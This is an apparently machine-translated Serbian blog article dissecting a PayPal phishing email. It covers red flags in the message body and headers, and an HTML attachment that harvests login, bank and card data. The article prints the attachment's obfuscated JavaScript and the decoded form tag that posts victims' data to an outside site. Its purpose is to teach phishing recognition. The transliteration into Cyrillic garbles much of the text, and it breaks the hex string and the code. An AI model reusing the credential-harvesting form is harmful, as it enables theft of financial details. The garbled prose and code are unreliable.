10Sep
У данашњем свету у којем су информације на мрежи доступне на мрежи, пхисхинг је један од најпопуларнијих и разорних онлајн напада, јер увек можете очистити вирус, али ако су ваши банкарски детаљи украдени, у невољи сте.Ево слома једног таквог напада који смо добили.
Немојте мислити да су то само ваши банкарски детаљи који су битни: уосталом, ако неко добије контролу над пријавом на рачун, они не знају само информације садржане у том рачуну, али шансе су да се исте информације за пријављивање могу користити на разнимдруги рачуни.А ако компромитују свој е-маил налог, они могу ресетовати све ваше друге лозинке.
Дакле, поред одржавања јаких и различитих лозинки, морате увек бити у потрази за лажним емаилом како се прави као стварна ствар.Иако су већина пхисхинг покушаја аматерски, неки су прилично убедљиви па је важно схватити како их препознати на површинском нивоу, као и како раде под поклопцем.
Слика од асирап
Испитивање Шта је у плаин сигхт
Наш е-маил примјер, као и већина покушаја пхисхинг-а, "обавјештава" вас о активностима на вашем ПаиПал рачуну који би у нормалним околностима били алармантни.Дакле, позив на акцију је да потврдите / вратите свој рачун тако што ћете доставити скоро сваки део личних информација о којима можете размишљати.Поново, ово је прилично формулирано.
Док сигурно постоје изузеци, прилично свака пхисхинг и превара е-пошта је напуњена црвеним заставама директно у самој поруци.Чак и ако је текст уверљив, обично можете пронаћи многе грешке које се читају кроз тело поруке које указују на то да порука није легитимна.
Порука тела
На први поглед, ово је једна од бољих е-маила за пхисхинг који сам видео.Нема грешака у писању или граматичким грешкама, а вербиаге чита према ономе што можете очекивати.Међутим, постоји неколико црвених застава које можете видети када мало детаљније испитате садржај.
- "Паипал" - Тачан случај је "ПаиПал"( капитал П).Можете видети да се обе поруке користе у поруци.Компаније су веома намерне са својим брендирањем, па је сумњиво да би овакав случај прошао процес гоњења.
- "дозволи АцтивеКс" - Колико пута сте видели законити веб базирани бизнис који величина Паипал-а користи власничку компоненту која ради само на једном претраживачу, посебно када подржавају више претраживача?Наравно, негде тамо негде компанија то ради, али ово је црвена заставица.
- "сигурно." - Примјетите како ова ријеч није постављена на маргини са остатком текста пасуса.Чак и ако проширим прозор мало више, он се не уклапа правилно или исправно.
- "Паипал!" - Простор пре узвичника изгледа неугодан.Само још једна ствар која је сигурна да не би била у легитимном емаилу.
- "ПаиПал-Аццоунт Упдате Форм.пдф.хтм" - Зашто би Паипал приложио "ПДФ" посебно када би могли само да се повежу са страном на њиховој веб локацији?Поред тога, зашто би покушали да прикрију ХТМЛ датотеку као ПДФ?Ово је највећа црвена заставица свих њих.
Порука заглавља
Када погледате заглавље поруке, појављују се још неколико црвених заставица:
- Од адресе је тест@тест.цом.
- Недостаје адреса.Нисам ово одбацио, једноставно није дио стандардног заглавља поруке.Обично компанија која има ваше име персонализује е-пошту за вас.
Прилог
Када отворим прилог, одмах можете да видите да изглед није тачан јер недостаје информације о стилу.Опет, зашто би ПаиПал пошао путем ХТМЛ формулара када би вам једноставно могли дати линк на њиховој веб локацији?
Напомена: смо користили Гмаилов уграђени прегледач прилога ХТМЛ-а, али ми препоручујемо да НЕ ОТВАРАТЕ прилоге из сцаммерс-а.Никад.Евер.Врло често садрже експлоатације које ће на ваш рачунар инсталирати тројанце како би украли информације о налогу.
Померајући се мало више, можете видети да овај образац пита не само за наше податке за пријављивање путем ПаиПал-а, већ и за информације о банкарским и кредитним картицама.Неке слике су покварене.
Очигледно је да овај покушај лажирања иде по свему с једним ударцем.
Технички круг
Иако би требало бити прилично јасан на основу онога што је у очима да је то покушај лажног представљања, сада ћемо разбити технички састав е-поште и видети шта можемо да нађемо.
Информације из додатка
Прва ствар коју треба погледати је ХТМЛ извор образац за прилог који је оно што подноси податке на лажну локацију.
Када брзо прегледате извор, све везе се појављују важећим пошто упућују на "паипал.цом" или "паипалобјецтс.цом" који су обоје легитимни.
Сада ћемо погледати неке основне информације о Фирефоку које се окупљају на страници.
Као што можете видети, неке од графика су извучене из домена "блесседтобе.цом", "гоодхеалтхпхармаци.цом" и "пиц-уплоад.де" умјесто легалних ПаиПал домена.
Информације из заглавља за е-пошту
Следеће ћемо погледати наслове заглављених порука е-поште.Гмаил чини ову опцију доступном преко опције Схов Оригинал мену на поруци.
Ако погледате информације о заглављу за првобитну поруку, можете видети да је ова порука састављена помоћу програма Оутлоок Екпресс 6. Сумњам да ПаиПал има некога у особљу које ручно шаље сваку од ових порука путем застарелог клијента е-поште.
Сада посматрамо информације о усмеривању, можемо видети ИП адресу како пошиљаоца, тако и сервера за преношење поште.
"Корисничка" ИП адреса је оригинални пошиљао.Ако брзо претражимо информације о ИП-у, можемо видети да је ИП за слање у Немачкој.
И када погледамо послужитељ за поштанску пошту( маил.итак.ат), ИП адресу можемо видети да је ово ИСП са седиштем у Аустрији.Сумњам да је ПаиПал усмерио своје е-маилове директно преко ИСП-а у Аустрији када имају масивну фарму сервера која би лако могла да се носи са овим задатком.
Где се подаци крећу?
Дакле, јасно смо утврдили да је ово пхисхинг е-пошта и прикупили неке информације о томе одакле је дошла порука, али шта је са тим где се подаци шаљу?
Да бисмо видели ово, прво ћемо сачувати ХТМ прилог на нашој радној површини и отворити је у уређивачу текста.Листањем кроз то, изгледа да је све у реду, осим када дођемо до сумњивог блока Јавасцрипт-а.
Искључујући пун извор последњег блока Јавасцрипта, видимо:
& лт; скриптни језик = "ЈаваСцрипт" типе = "тект / јавасцрипт" & гт;
// Цопиригхт © 2005 Воормедиа - ВВВ.ВООРМЕДИА.ЦОМ
вар и, и, к = "3ц666ф726д206е616д653д226д61696е222069643д226д61696е22206д6574686ф643д22706ф73742220616374696ф6е3д22687474703а2ф2ф7777772е646578706ф737572652е6е65742ф6262732ф646174612ф7665726966792е706870223е"; и = "; фор( и = 0; и & лт; к.ленгтх; и + = 2){ и + = унесцапе( '%' + к.субстр( и, 2));} доцумент.врите( и);
& лт; / сцрипт & гт;
Увек када видите велику скривену низ наизглед случајних слова и бројева уграђених у блок Јавасцрипт, то је обично нешто сумњиво.Гледајући код, променљива "к" је постављена на овај велики низ, а затим декодирана у варијаблу "и".Коначни резултат променљиве "и" се затим уписује у документ као ХТМЛ.
Од великог низа се састоји од бројева 0-9 и слова АФ, што је највероватније кодирана преко једноставног АСЦИИ за Хек конверзије:
3ц666ф726д206е616д653д226д61696е222069643д226д61696е22206д6574686ф643д22706ф73742220616374696ф6е3д22687474703а2ф2ф7777772е646578706ф737572652е6е65742ф6262732ф646174612ф7665726966792е706870223е
преводи на:
& лт; облик име = "главни"? Ид = "маин"метход = "пост" ацтион = "хттп: //www.dexposure.net/bbs/data/ верифи.пхп" & гт;
Није случајно да се ово декодира у важећу ознаку ХТМЛ формулара која шаље резултате не ПаиПал-у, већ на неправилног сајта.
Додатно, када погледате ХТМЛ извор формулара, видећете да ова ознака за форму није видљива јер се динамички генерише преко Јавасцрипта.Ово је паметан начин да сакријете оно што ХТМЛ заправо ради ако неко једноставно прикаже генерирани извор прилога( као што смо раније радили), насупрот отварању прилога директно у уређивачу текста.
Покретање брзог који је на месту где се крши, можемо видети да је ово домен хостован на популарном веб хосту, 1анд1.
Оно што истиче је да домен користи читљиво име( за разлику од нешто попут "дфх3сјхскјхв.нет") и домен је регистрован 4 године.Због овога, верујем да је овај домен био отмијен и кориштен као павн у овом покушају лажирања.
Цинизам је добра одбрана
Када се ради о сигурности на интернету, никада боли да има добар део цинизма.
Док сам сигуран да у примјеру е-поште има више црвених заставица, оно што смо истакли горе су индикатори које смо видели након само неколико минута испитивања.Хипотетички, ако је површински ниво е-поште имигрирао свог легитимног партнера 100%, техничка анализа би и даље открила њену праву природу.Због тога је увоз да бисте могли да испитате шта можете и не можете да видите.